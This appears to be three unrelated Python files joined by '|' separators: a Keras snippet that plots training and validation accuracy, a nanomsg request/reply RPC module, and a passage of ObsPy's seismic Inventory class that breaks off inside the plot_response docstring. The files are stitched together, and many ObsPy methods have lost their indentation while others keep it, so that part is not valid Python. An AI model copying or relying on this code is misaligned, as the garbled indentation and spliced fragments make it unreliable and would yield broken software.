pipe.fit(X_train, y_train)
history = pipe.history.history
print(DataFrame(history))
# depends on version
# Newer keras uses 'accuracy'/'val_accuracy'; older releases used 'acc'/'val_acc'.
if 'accuracy' in history:
    ac_train = history['accuracy']
    ac_val = history['val_accuracy']
elif 'acc' in history:
    ac_train = history['acc']
    ac_val = history['val_acc']
else:
    raise ValueError("History object doesn't contain accuracy record")
# 1-based epoch axis for plotting.
epoch = np.arange(len(ac_train)) + 1
##############################################
# Training Curves
##############################################
plt.plot(epoch, ac_train, 'o', label="train")
plt.plot(epoch, ac_val, '+', label="validation")
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.legend()
plt.show()
|
'''
The MIT License (MIT)
Copyright (c) 2016 Tony Walker
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import uuid
import nanomsg
import logging
from .error import DecodeError
from .error import RequestParseError
from .error import AuthenticateError
from .error import AuthenticatorInvalidSignature
from .encoder import MsgPackEncoder
from .core import Endpoint
from .core import Process
class Responder(Endpoint, Process):
    """ A service which responds to requests """
    # pylint: disable=too-many-arguments
    # pylint: disable=no-member

    def __init__(self, address, encoder=None, authenticator=None,
                 socket=None, bind=True, timeouts=(None, None)):
        """Create a REP endpoint bound (by default) to `address`.

        :param address: transport address to bind/connect to
        :param encoder: payload encoder; defaults to MsgPackEncoder
        :param authenticator: optional request authenticator
        :param socket: pre-built nanomsg socket; a REP socket is created
            when omitted
        :param bind: bind (True) or connect (False) the socket
        :param timeouts: (receive, send) timeouts passed to Endpoint
        """
        # Defaults
        socket = socket or nanomsg.Socket(nanomsg.REP)
        encoder = encoder or MsgPackEncoder()
        super(Responder, self).__init__(
            socket, address, bind, encoder, authenticator, timeouts)
        self.methods = {}       # method name -> callable
        self.descriptions = {}  # method name -> human readable description

    def execute(self, method, args, ref):
        """ Execute the method with args

        Returns a response dict with 'result', 'error' and the caller's
        correlation 'ref'. Any exception raised by the registered callable
        is logged and reported back as an error string instead of
        propagating (a service must always answer).
        """
        response = {'result': None, 'error': None, 'ref': ref}
        fun = self.methods.get(method)
        if not fun:
            response['error'] = 'Method `{}` not found'.format(method)
        else:
            try:
                response['result'] = fun(*args)
            except Exception as exception:
                logging.error(exception, exc_info=1)
                response['error'] = str(exception)
        return response

    def register(self, name, fun, description=None):
        """ Register function on this service """
        self.methods[name] = fun
        self.descriptions[name] = description

    @classmethod
    def parse(cls, payload):
        """ Parse client request

        The payload must be a 3-sequence (method, args, ref); anything
        else is wrapped in a RequestParseError.
        """
        try:
            method, args, ref = payload
        except Exception as exception:
            raise RequestParseError(exception)
        else:
            return method, args, ref

    # pylint: disable=logging-format-interpolation
    def process(self):
        """ Receive data from socket and process request

        Errors during receive/parse are logged and an empty reply is sent,
        so the REP socket never gets stuck waiting to answer.
        """
        response = None
        try:
            payload = self.receive()
            method, args, ref = self.parse(payload)
            response = self.execute(method, args, ref)
        # The two authentication failures were previously handled by two
        # clauses with identical bodies; one tuple clause is equivalent.
        except (AuthenticateError, AuthenticatorInvalidSignature) as exception:
            logging.error(
                'Service error while authenticating request: {}'
                .format(exception), exc_info=1)
        except DecodeError as exception:
            logging.error(
                'Service error while decoding request: {}'
                .format(exception), exc_info=1)
        except RequestParseError as exception:
            logging.error(
                'Service error while parsing request: {}'
                .format(exception), exc_info=1)
        else:
            logging.debug('Service received payload: {}'.format(payload))
        if response:
            self.send(response)
        else:
            self.send('')
class Requester(Endpoint):
    """ A requester client """
    # pylint: disable=too-many-arguments
    # pylint: disable=no-member

    def __init__(self, address, encoder=None, authenticator=None,
                 socket=None, bind=False, timeouts=(None, None)):
        """Create a REQ endpoint connected (by default) to `address`."""
        # Fall back to a fresh REQ socket / msgpack encoder when not given.
        socket = socket or nanomsg.Socket(nanomsg.REQ)
        encoder = encoder or MsgPackEncoder()
        super(Requester, self).__init__(
            socket, address, bind, encoder, authenticator, timeouts)

    @classmethod
    def build_payload(cls, method, args):
        """ Build the payload to be sent to a `Responder` """
        # A fresh UUID correlates each request with its reply.
        return (method, args, str(uuid.uuid4()))

    # pylint: disable=logging-format-interpolation
    def call(self, method, *args):
        """ Make a call to a `Responder` and return the result """
        payload = self.build_payload(method, args)
        logging.debug('* Client will send payload: {}'.format(payload))
        self.send(payload)
        reply = self.receive()
        # Sanity check: the reply must echo the correlation ref we sent.
        assert payload[2] == reply['ref']
        return reply['result'], reply['error']
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Provides the Inventory class.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
from future.utils import python_2_unicode_compatible, native_str
import copy
import fnmatch
import os
import textwrap
import warnings
import obspy
from obspy.core.util.base import (ENTRY_POINTS, ComparingObject,
_read_from_plugin, NamedTemporaryFile,
download_to_file, sanitize_filename)
from obspy.core.util.decorator import map_example_filename
from obspy.core.util.misc import buffered_load_entry_point
from obspy.core.util.obspy_types import ObsPyException, ZeroSamplingRate
from .network import Network
from .util import _unified_content_strings, _textwrap
# Make sure this is consistent with obspy.io.stationxml! Importing it
# from there results in hard to resolve cyclic imports.
# Identifies the generating software in written inventory documents.
SOFTWARE_MODULE = "ObsPy %s" % obspy.__version__
SOFTWARE_URI = "https://www.obspy.org"
def _create_example_inventory():
    """
    Create an example inventory.
    """
    # The example StationXML file ships in the package's data directory.
    example_path = os.path.join(
        os.path.dirname(__file__), os.pardir, "data", "BW_GR_misc.xml")
    return read_inventory(example_path, format="STATIONXML")
@map_example_filename("path_or_file_object")
def read_inventory(path_or_file_object=None, format=None, *args, **kwargs):
    """
    Function to read inventory files.
    :param path_or_file_object: File name or file like object. If this
        attribute is omitted, an example :class:`Inventory`
        object will be returned.
    :type format: str
    :param format: Format of the file to read (e.g. ``"STATIONXML"``). See the
        `Supported Formats`_ section below for a list of supported formats.
    :rtype: :class:`~obspy.core.inventory.inventory.Inventory`
    :return: An ObsPy :class:`~obspy.core.inventory.inventory.Inventory`
        object.

    Additional args and kwargs are passed on to the underlying ``_read_X()``
    methods of the inventory plugins.

    .. rubric:: _`Supported Formats`

    Additional ObsPy modules extend the functionality of the
    :func:`~obspy.core.inventory.inventory.read_inventory` function. The
    following table summarizes all known file formats currently supported by
    ObsPy.
    Please refer to the `Linked Function Call`_ of each module for any extra
    options available at the import stage.

    %s

    .. note::
        For handling additional information not covered by the
        StationXML standard and how to output it to StationXML
        see the :ref:`ObsPy Tutorial <stationxml-extra>`.
    """
    if path_or_file_object is None:
        # if no pathname or URL specified, return example catalog
        return _create_example_inventory()
    elif isinstance(path_or_file_object, (str, native_str)) and \
            "://" in path_or_file_object:
        # some URL
        # extract extension if any
        suffix = \
            os.path.basename(path_or_file_object).partition('.')[2] or '.tmp'
        # Download to a temporary file (kept alive by the context manager),
        # then recurse to parse it like a local path.
        with NamedTemporaryFile(suffix=sanitize_filename(suffix)) as fh:
            download_to_file(url=path_or_file_object, filename_or_buffer=fh)
            return read_inventory(fh.name, format=format)
    # Local path or file-like object: dispatch to the plugin system;
    # _read_from_plugin returns (object, format), we only need the object.
    return _read_from_plugin("inventory", path_or_file_object,
                             format=format, *args, **kwargs)[0]
@python_2_unicode_compatible
class Inventory(ComparingObject):
"""
The root object of the Inventory->Network->Station->Channel hierarchy.
In essence just a container for one or more networks.
"""
def __init__(self, networks=None, source=SOFTWARE_MODULE, sender=None,
created=None, module=SOFTWARE_MODULE,
module_uri=SOFTWARE_URI):
"""
:type networks: list of
:class:`~obspy.core.inventory.network.Network`
:param networks: A list of networks part of this inventory.
:type source: str
:param source: Network ID of the institution sending the message.
:type sender: str, optional
:param sender: Name of the institution sending this message.
:type created: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param created: The time when the document was created. Will be set to
the current time if not given.
:type module: str
:param module: Name of the software module that generated this
document, defaults to ObsPy related information.
:type module_uri: str
:param module_uri: This is the address of the query that generated the
document, or, if applicable, the address of the software that
generated this document, defaults to ObsPy related information.
.. note::
For handling additional information not covered by the
StationXML standard and how to output it to StationXML
see the :ref:`ObsPy Tutorial <stationxml-extra>`.
"""
self.networks = networks if networks is not None else []
self.source = source
self.sender = sender
self.module = module
self.module_uri = module_uri
# Set the created field to the current time if not given otherwise.
if created is None:
self.created = obspy.UTCDateTime()
else:
self.created = created
def __add__(self, other):
new = copy.deepcopy(self)
new += other
return new
def __iadd__(self, other):
if isinstance(other, Inventory):
self.networks.extend(other.networks)
# This is a straight inventory merge.
self.__copy_inventory_metadata(other)
elif isinstance(other, Network):
self.networks.append(other)
else:
msg = ("Only Inventory and Network objects can be added to "
"an Inventory.")
raise TypeError(msg)
return self
    def __len__(self):
        # The length of an inventory is its number of networks.
        return len(self.networks)

    def __getitem__(self, index):
        # Indexing/slicing delegates to the underlying network list.
        return self.networks[index]
def __copy_inventory_metadata(self, other):
"""
Will be called after two inventory objects have been merged. It
attempts to assure that inventory meta information is somewhat
correct after the merging.
The networks in other will have been moved to self.
"""
# The creation time is naturally adjusted to the current time.
self.created = obspy.UTCDateTime()
# Merge the source.
srcs = [self.source, other.source]
srcs = [_i for _i in srcs if _i]
all_srcs = []
for src in srcs:
all_srcs.extend(src.split(","))
if all_srcs:
src = sorted(list(set(all_srcs)))
self.source = ",".join(src)
else:
self.source = None
# Do the same with the sender.
sndrs = [self.sender, other.sender]
sndrs = [_i for _i in sndrs if _i]
all_sndrs = []
for sndr in sndrs:
all_sndrs.extend(sndr.split(","))
if all_sndrs:
sndr = sorted(list(set(all_sndrs)))
self.sender = ",".join(sndr)
else:
self.sender = None
# The module and URI strings will be changed to ObsPy as it did the
# modification.
self.module = SOFTWARE_MODULE
self.module_uri = SOFTWARE_URI
def get_contents(self):
"""
Returns a dictionary containing the contents of the object.
.. rubric:: Example
>>> example_filename = "/path/to/IRIS_single_channel_with_response.xml"
>>> inventory = read_inventory(example_filename)
>>> inventory.get_contents() \
# doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
{...}
>>> for k, v in sorted(inventory.get_contents().items()): \
# doctest: +NORMALIZE_WHITESPACE
... print(k, v[0])
channels IU.ANMO.10.BHZ
networks IU
stations IU.ANMO (Albuquerque, New Mexico, USA)
"""
content_dict = {
"networks": [],
"stations": [],
"channels": []}
for network in self.networks:
content_dict['networks'].append(network.code)
for key, value in network.get_contents().items():
content_dict.setdefault(key, [])
content_dict[key].extend(value)
content_dict[key].sort()
content_dict['networks'].sort()
return content_dict
    def __str__(self):
        # Build the multi-line, tab-indented summary shown by print().
        ret_str = "Inventory created at %s\n" % str(self.created)
        if self.module:
            module_uri = self.module_uri
            # Truncate overly long URIs so the line stays readable.
            if module_uri and len(module_uri) > 70:
                module_uri = textwrap.wrap(module_uri, width=67)[0] + "..."
            ret_str += ("\tCreated by: %s%s\n" % (
                self.module,
                "\n\t\t %s" % (module_uri if module_uri else "")))
        ret_str += "\tSending institution: %s%s\n" % (
            self.source, " (%s)" % self.sender if self.sender else "")
        contents = self.get_contents()
        ret_str += "\tContains:\n"
        # Networks and channels are wrapped comma-separated lists;
        # stations get one line each.
        ret_str += "\t\tNetworks (%i):\n" % len(contents["networks"])
        ret_str += "\n".join(_textwrap(
            ", ".join(_unified_content_strings(contents["networks"])),
            initial_indent="\t\t\t", subsequent_indent="\t\t\t",
            expand_tabs=False))
        ret_str += "\n"
        ret_str += "\t\tStations (%i):\n" % len(contents["stations"])
        ret_str += "\n".join([
            "\t\t\t%s" % _i
            for _i in _unified_content_strings(contents["stations"])])
        ret_str += "\n"
        ret_str += "\t\tChannels (%i):\n" % len(contents["channels"])
        ret_str += "\n".join(_textwrap(
            ", ".join(_unified_content_strings(contents["channels"])),
            initial_indent="\t\t\t", subsequent_indent="\t\t\t",
            expand_tabs=False))
        return ret_str
    def _repr_pretty_(self, p, cycle):
        # IPython pretty-printing hook: reuse the plain __str__ output.
        p.text(str(self))
    def write(self, path_or_file_object, format, **kwargs):
        """
        Writes the inventory object to a file or file-like object in
        the specified format.

        :param path_or_file_object: File name or file-like object to be written
            to.
        :type format: str
        :param format: The file format to use (e.g. ``"STATIONXML"``). See the
            `Supported Formats`_ section below for a list of supported formats.
        :param kwargs: Additional keyword arguments passed to the underlying
            plugin's writer method.

        .. rubric:: Example

        >>> from obspy import read_inventory
        >>> inventory = read_inventory()
        >>> inventory.write("example.xml",
        ...                 format="STATIONXML")  # doctest: +SKIP

        .. rubric:: _`Supported Formats`

        Additional ObsPy modules extend the parameters of the
        :meth:`~obspy.core.inventory.inventory.Inventory.write()` method. The
        following table summarizes all known formats with write capability
        currently available for ObsPy.
        Please refer to the `Linked Function Call`_ of each module for any
        extra options available.

        %s
        """
        # Formats are registered upper-case in the entry-point table.
        format = format.upper()
        try:
            # get format specific entry point
            format_ep = ENTRY_POINTS['inventory_write'][format]
            # search writeFormat method for given entry point
            write_format = buffered_load_entry_point(
                format_ep.dist.key,
                'obspy.plugin.inventory.%s' % (format_ep.name), 'writeFormat')
        except (IndexError, ImportError, KeyError):
            # Unknown or broken plugin: report which formats would work.
            msg = "Writing format '{}' is not supported. Supported types: {}"
            msg = msg.format(format,
                             ', '.join(ENTRY_POINTS['inventory_write']))
            raise ValueError(msg)
        return write_format(self, path_or_file_object, **kwargs)
@property
def networks(self):
return self._networks
@networks.setter
def networks(self, value):
if not hasattr(value, "__iter__"):
msg = "networks needs to be iterable, e.g. a list."
raise ValueError(msg)
if any([not isinstance(x, Network) for x in value]):
msg = "networks can only contain Network objects."
raise ValueError(msg)
self._networks = value
    def get_response(self, seed_id, datetime):
        """
        Find response for a given channel at given time.

        >>> from obspy import read_inventory, UTCDateTime
        >>> inventory = read_inventory("/path/to/IU_ANMO_BH.xml")
        >>> datetime = UTCDateTime("2012-08-24T00:00:00")
        >>> response = inventory.get_response("IU.ANMO.00.BHZ", datetime)
        >>> print(response)  # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
        Channel Response
            From M/S (Velocity in Meters Per Second) to COUNTS (Digital Counts)
            Overall Sensitivity: 3.27508e+09 defined at 0.020 Hz
            3 stages:
                Stage 1: PolesZerosResponseStage from M/S to V, gain: 1952.1
                Stage 2: CoefficientsTypeResponseStage from V to COUNTS, gain: ...
                Stage 3: CoefficientsTypeResponseStage from COUNTS to COUNTS, ...

        :type seed_id: str
        :param seed_id: SEED ID string of channel to get response for.
        :type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param datetime: Time to get response for.
        :rtype: :class:`~obspy.core.inventory.response.Response`
        :returns: Response for time series specified by input arguments.
        """
        # Only the network part of "NET.STA.LOC.CHA" is used for the
        # coarse filter; the full seed_id is passed down to the network.
        network, _, _, _ = seed_id.split(".")
        responses = []
        for net in self.networks:
            if net.code != network:
                continue
            # Best-effort collection: networks without a matching response
            # raise, which is deliberately swallowed here.
            try:
                responses.append(net.get_response(seed_id, datetime))
            except Exception:
                pass
        if len(responses) > 1:
            # Ambiguous metadata: warn but still return the first match.
            msg = "Found more than one matching response. Returning first."
            warnings.warn(msg)
        elif len(responses) < 1:
            msg = "No matching response information found."
            raise Exception(msg)
        return responses[0]
    def get_channel_metadata(self, seed_id, datetime=None):
        """
        Return basic metadata for a given channel.

        :type seed_id: str
        :param seed_id: SEED ID string of channel to get metadata for.
        :type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
        :param datetime: Time to get metadata for.
        :rtype: dict
        :return: Dictionary containing coordinates and orientation (latitude,
            longitude, elevation, azimuth, dip)
        """
        # Same best-effort lookup strategy as get_response(): filter on the
        # network code, collect candidates, then warn/raise on ambiguity.
        network, _, _, _ = seed_id.split(".")
        metadata = []
        for net in self.networks:
            if net.code != network:
                continue
            try:
                metadata.append(net.get_channel_metadata(seed_id, datetime))
            except Exception:
                pass
        if len(metadata) > 1:
            msg = ("Found more than one matching channel metadata. "
                   "Returning first.")
            warnings.warn(msg)
        elif len(metadata) < 1:
            msg = "No matching channel metadata found."
            raise Exception(msg)
        return metadata[0]
def get_coordinates(self, seed_id, datetime=None):
"""
Return coordinates for a given channel.
>>> from obspy import read_inventory, UTCDateTime
>>> inv = read_inventory()
>>> t = UTCDateTime("2015-01-01")
>>> inv.get_coordinates("GR.FUR..LHE", t) # doctest: +SKIP
{'elevation': 565.0,
'latitude': 48.162899,
'local_depth': 0.0,
'longitude': 11.2752}
:type seed_id: str
:param seed_id: SEED ID string of channel to get coordinates for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param datetime: Time to get coordinates for.
:rtype: dict
:return: Dictionary containing coordinates (latitude, longitude,
elevation, local_depth)
"""
metadata = self.get_channel_metadata(seed_id, datetime)
coordinates = {}
for key in ['latitude', 'longitude', 'elevation', 'local_depth']:
coordinates[key] = metadata[key]
return coordinates
def get_orientation(self, seed_id, datetime=None):
"""
Return orientation for a given channel.
>>> from obspy import read_inventory, UTCDateTime
>>> inv = read_inventory()
>>> t = UTCDateTime("2015-01-01")
>>> inv.get_orientation("GR.FUR..LHE", t) # doctest: +SKIP
{'azimuth': 90.0,
'dip': 0.0}
:type seed_id: str
:param seed_id: SEED ID string of channel to get orientation for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param datetime: Time to get orientation for.
:rtype: dict
:return: Dictionary containing orientation (azimuth, dip).
"""
metadata = self.get_channel_metadata(seed_id, datetime)
orientation = {}
for key in ['azimuth', 'dip']:
orientation[key] = metadata[key]
return orientation
    def select(self, network=None, station=None, location=None, channel=None,
               time=None, starttime=None, endtime=None, sampling_rate=None,
               keep_empty=False):
        r"""
        Returns the :class:`Inventory` object with only the
        :class:`~obspy.core.inventory.network.Network`\ s /
        :class:`~obspy.core.inventory.station.Station`\ s /
        :class:`~obspy.core.inventory.channel.Channel`\ s that match the given
        criteria (e.g. all channels with ``channel="EHZ"``).

        .. warning::
            The returned object is based on a shallow copy of the original
            object. That means that modifying any mutable child elements will
            also modify the original object
            (see https://docs.python.org/2/library/copy.html).
            Use :meth:`copy()` afterwards to make a new copy of the data in
            memory.

        .. rubric:: Example

        >>> from obspy import read_inventory, UTCDateTime
        >>> inv = read_inventory()
        >>> t = UTCDateTime(2007, 7, 1, 12)
        >>> inv = inv.select(channel="*Z", station="[RW]*", time=t)
        >>> print(inv)  # doctest: +NORMALIZE_WHITESPACE
        Inventory created at 2014-03-03T11:07:06.198000Z
            Created by: fdsn-stationxml-converter/1.0.0
                    http://www.iris.edu/fdsnstationconverter
            Sending institution: Erdbebendienst Bayern
            Contains:
                Networks (2):
                    BW, GR
                Stations (2):
                    BW.RJOB (Jochberg, Bavaria, BW-Net)
                    GR.WET (Wettzell, Bavaria, GR-Net)
                Channels (4):
                    BW.RJOB..EHZ, GR.WET..BHZ, GR.WET..HHZ, GR.WET..LHZ

        The `network`, `station`, `location` and `channel` selection criteria
        may also contain UNIX style wildcards (e.g. ``*``, ``?``, ...; see
        :func:`~fnmatch.fnmatch`).

        :type network: str
        :param network: Potentially wildcarded network code. If not given,
            all network codes will be accepted.
        :type station: str
        :param station: Potentially wildcarded station code. If not given,
            all station codes will be accepted.
        :type location: str
        :param location: Potentially wildcarded location code. If not given,
            all location codes will be accepted.
        :type channel: str
        :param channel: Potentially wildcarded channel code. If not given,
            all channel codes will be accepted.
        :type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param time: Only include networks/stations/channels active at given
            point in time.
        :type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param starttime: Only include networks/stations/channels active at or
            after given point in time (i.e. channels ending before given time
            will not be shown).
        :type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param endtime: Only include networks/stations/channels active before
            or at given point in time (i.e. channels starting after given time
            will not be shown).
        :type sampling_rate: float
        :type keep_empty: bool
        :param keep_empty: If set to `True`, networks/stations that match
            themselves but have no matching child elements (stations/channels)
            will be included in the result.
        """
        networks = []
        for net in self.networks:
            # skip if any given criterion is not matched
            # Code comparison is case-insensitive (both sides upper-cased).
            if network is not None:
                if not fnmatch.fnmatch(net.code.upper(),
                                       network.upper()):
                    continue
            if any([t is not None for t in (time, starttime, endtime)]):
                if not net.is_active(time=time, starttime=starttime,
                                     endtime=endtime):
                    continue
            # Remember whether the network had stations BEFORE filtering,
            # so originally-empty networks are not dropped below.
            has_stations = bool(net.stations)
            net_ = net.select(
                station=station, location=location, channel=channel, time=time,
                starttime=starttime, endtime=endtime,
                sampling_rate=sampling_rate, keep_empty=keep_empty)
            # If the network previously had stations but no longer has any
            # and keep_empty is False: Skip the network.
            if has_stations and not keep_empty and not net_.stations:
                continue
            networks.append(net_)
        # Shallow copy on purpose (see the warning in the docstring):
        # only the network list is replaced.
        inv = copy.copy(self)
        inv.networks = networks
        return inv
def plot(self, projection='global', resolution='l',
continent_fill_color='0.9', water_fill_color='1.0', marker="v",
size=15**2, label=True, color='#b15928', color_per_network=False,
colormap="Paired", legend="upper left", time=None, show=True,
outfile=None, method=None, fig=None, **kwargs): # @UnusedVariable
"""
Creates a preview map of all networks/stations in current inventory
object.
:type projection: str, optional
:param projection: The map projection. Currently supported are:
* ``"global"`` (Will plot the whole world.)
* ``"ortho"`` (Will center around the mean lat/long.)
* ``"local"`` (Will plot around local events)
Defaults to ``"global"``
:type resolution: str, optional
:param resolution: Resolution of the boundary database to use. Will be
based directly to the basemap module. Possible values are:
* ``"c"`` (crude)
* ``"l"`` (low)
* ``"i"`` (intermediate)
* ``"h"`` (high)
* ``"f"`` (full)
Defaults to ``"l"``
:type continent_fill_color: Valid matplotlib color, optional
:param continent_fill_color: Color of the continents. Defaults to
``"0.9"`` which is a light gray.
:type water_fill_color: Valid matplotlib color, optional
:param water_fill_color: Color of all water bodies.
Defaults to ``"white"``.
:type marker: str
:param marker: Marker symbol (see :func:`matplotlib.pyplot.scatter`).
:type size: float
:param size: Marker size (see :func:`matplotlib.pyplot.scatter`).
:type label: bool
:param label: Whether to label stations with "network.station" or not.
:type color: str
:param color: Face color of marker symbol (see
:func:`matplotlib.pyplot.scatter`). Defaults to the first color
from the single-element "Paired" color map.
:type color_per_network: bool or dict
:param color_per_network: If set to ``True``, each network will be
drawn in a different color. A dictionary can be provided that maps
network codes to color values (e.g.
``color_per_network={"GR": "black", "II": "green"}``).
:type colormap: str, any matplotlib colormap, optional
:param colormap: Only used if ``color_per_network=True``. Specifies
which colormap is used to draw the colors for the individual
networks. Defaults to the "Paired" color map.
:type legend: str or None
:param legend: Location string for legend, if networks are plotted in
different colors (i.e. option ``color_per_network`` in use). See
:func:`matplotlib.pyplot.legend` for possible values for
legend location string. To disable legend set to ``None``.
:type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param time: Only plot stations available at given point in time.
:type show: bool
:param show: Whether to show the figure after plotting or not. Can be
used to do further customization of the plot before showing it.
:type outfile: str
:param outfile: Output file path to directly save the resulting image
(e.g. ``"/tmp/image.png"``). Overrides the ``show`` option, image
will not be displayed interactively. The given path/file name is
also used to automatically determine the output format. Supported
file formats depend on your matplotlib backend. Most backends
support png, pdf, ps, eps and svg. Defaults to ``None``.
:type method: str
:param method: Method to use for plotting. Possible values are:
* ``'basemap'`` to use the Basemap library
* ``'cartopy'`` to use the Cartopy library
* ``None`` to use the best available library
Defaults to ``None``.
:type fig: :class:`matplotlib.figure.Figure`
:param fig: Figure instance to reuse, returned from a previous
inventory/catalog plot call with `method=basemap`.
If a previous basemap plot is reused, any kwargs regarding the
basemap plot setup will be ignored (i.e. `projection`,
`resolution`, `continent_fill_color`, `water_fill_color`). Note
that multiple plots using colorbars likely are problematic, but
e.g. one station plot (without colorbar) and one event plot (with
colorbar) together should work well.
:returns: Figure instance with the plot.
.. rubric:: Example
Mollweide projection for global overview:
>>> from obspy import read_inventory
>>> inv = read_inventory()
>>> inv.plot(label=False) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(label=False)
Orthographic projection, automatic colors per network:
>>> inv.plot(projection="ortho", label=False,
... color_per_network=True) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(projection="ortho", label=False, color_per_network=True)
Local (Albers equal area) projection, with custom colors:
>>> colors = {'GR': 'blue', 'BW': 'green'}
>>> inv.plot(projection="local",
... color_per_network=colors) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(projection="local",
color_per_network={'GR': 'blue',
'BW': 'green'})
Combining a station and event plot (uses basemap):
>>> from obspy import read_inventory, read_events
>>> inv = read_inventory()
>>> cat = read_events()
>>> fig = inv.plot(method="basemap", show=False) # doctest:+SKIP
>>> cat.plot(method="basemap", fig=fig) # doctest:+SKIP
.. plot::
from obspy import read_inventory, read_events
inv = read_inventory()
cat = read_events()
fig = inv.plot(show=False)
cat.plot(fig=fig)
"""
from obspy.imaging.maps import plot_map
import matplotlib.pyplot as plt
# The empty ones must be kept as otherwise inventory files without
# channels will end up with nothing.
inv = self.select(time=time, keep_empty=True)
# lat/lon coordinates, magnitudes, dates
lats = []
lons = []
labels = []
colors = []
if color_per_network and not isinstance(color_per_network, dict):
from matplotlib.cm import get_cmap
codes = set([n.code for n in inv])
cmap = get_cmap(name=colormap, lut=len(codes))
color_per_network = dict([(code, cmap(i))
for i, code in enumerate(sorted(codes))])
for net in inv:
for sta in net:
if sta.latitude is None or sta.longitude is None:
msg = ("Station '%s' does not have latitude/longitude "
"information and will not be plotted." % label)
warnings.warn(msg)
continue
if color_per_network:
label_ = " %s" % sta.code
color_ = color_per_network.get(net.code, "k")
else:
label_ = " " + ".".join((net.code, sta.code))
color_ = color
lats.append(sta.latitude)
lons.append(sta.longitude)
labels.append(label_)
colors.append(color_)
if not label:
labels = None
fig = plot_map(method, lons, lats, size, colors, labels,
projection=projection, resolution=resolution,
continent_fill_color=continent_fill_color,
water_fill_color=water_fill_color,
colormap=None, colorbar=False, marker=marker,
title=None, show=False, fig=fig, **kwargs)
if legend is not None and color_per_network:
ax = fig.axes[0]
count = len(ax.collections)
for code, color in sorted(color_per_network.items()):
ax.scatter([0], [0], size, color, label=code, marker=marker)
# workaround for older matplotlib versions
try:
ax.legend(loc=legend, fancybox=True, scatterpoints=1,
fontsize="medium", markerscale=0.8,
handletextpad=0.1)
except TypeError:
leg_ = ax.legend(loc=legend, fancybox=True, scatterpoints=1,
markerscale=0.8, handletextpad=0.1)
leg_.prop.set_size("medium")
# remove collections again solely created for legend handles
ax.collections = ax.collections[:count]
if outfile:
fig.savefig(outfile)
else:
if show:
plt.show()
return fig
    def plot_response(self, min_freq, output="VEL", network="*", station="*",
                      location="*", channel="*", time=None, starttime=None,
                      endtime=None, axes=None, unwrap_phase=False,
                      plot_degrees=False, show=True, outfile=None):
        """
        Show bode plot of instrument response of all (or a subset of) the
        inventory's channels.
        :type min_freq: float
        :param min_freq: Lowest frequency to plot.
        :type output: str
        :param output: Output units. One of:
            * ``"DISP"`` -- displacement, output unit is meters;
            * ``"VEL"`` -- velocity, output unit is meters/second; or,
            * ``"ACC"`` -- acceleration, output unit is meters/second**2.
        :type network: str
        :param network: Only plot matching networks. Accepts UNIX style
            patterns and wildcards (e.g. ``"G*"``, ``"*[ER]"``; see
            :func:`~fnmatch.fnmatch`)
        :type station: str
        :param station: Only plot matching stations. Accepts UNIX style
            patterns and wildcards (e.g. ``"L44*"``, ``"L4?A"``,
            ``"[LM]44A"``; see :func:`~fnmatch.fnmatch`)
        :type location: str
        :param location: Only plot matching location codes. Accepts UNIX
            style patterns and wildcards (e.g. ``"00"``, ``"*0"``,
            ``"[01]0"``; see :func:`~fnmatch.fnmatch`)
        :type channel: str
        :param channel: Only plot matching channels. Accepts UNIX style
            patterns and wildcards (e.g. ``"BH*"``, ``"BH?"``, ``"*Z"``,
            ``"[LB]HZ"``; see :func:`~fnmatch.fnmatch`)
        :type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param time: Only regard networks/stations/channels active at given
            point in time.
        :type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param starttime: Only regard networks/stations/channels active at or
            after given point in time (i.e. networks ending before given time
            will not be shown).
        :type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param endtime: Only regard networks/stations/channels active before or
            at given point in time (i.e. networks starting after given time
            will not be shown).
        :type axes: list of 2 :class:`matplotlib.axes.Axes`
        :param axes: List/tuple of two axes instances to plot the
            amplitude/phase spectrum into. If not specified, a new figure is
            opened.
        :type unwrap_phase: bool
        :param unwrap_phase: Set optional phase unwrapping using NumPy.
        :type plot_degrees: bool
        :param plot_degrees: if ``True`` plot bode in degrees
        :type show: bool
        :param show: Whether to show the figure after plotting or not. Can be
            used to do further customization of the plot before showing it.
        :type outfile: str
        :param outfile: Output file path to directly save the resulting image
            (e.g. ``"/tmp/image.png"``). Overrides the ``show`` option, image
